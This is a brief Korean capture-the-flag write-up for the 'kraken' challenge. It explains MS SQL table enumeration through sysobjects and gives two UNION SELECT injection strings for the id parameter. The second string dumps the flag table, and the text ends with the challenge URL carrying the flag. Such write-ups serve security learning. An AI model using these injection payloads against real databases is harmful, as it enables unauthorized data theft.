kraken

첫 화면이다.

MS SQL에선 sysobjects 구문을 통해 테이블 명을 조회할 수 있다.

아래와 같이 조건절에 type='U' 를 삽입해 유저가 사용중인 테이블만 반환한다.

id에 ' union select name from sysobjects where xtype='U' and name like 'flag_%'-- 를 넣은 셈이다.

테이블 명을 알아냈으니 해당 테이블에서 값을 빼온다.

id에 ' union select * from flag_ccdfe62b-- 를 넣은 셈이다.

최종적으로, https://los.rubiya.kr/chall/kraken_647f3513b94339a4c59cf6f9074d0f92.php?pw=FLAG{a0819fc56beae985bac7d175c974cd27} 에 접속하면 문제가 풀린다.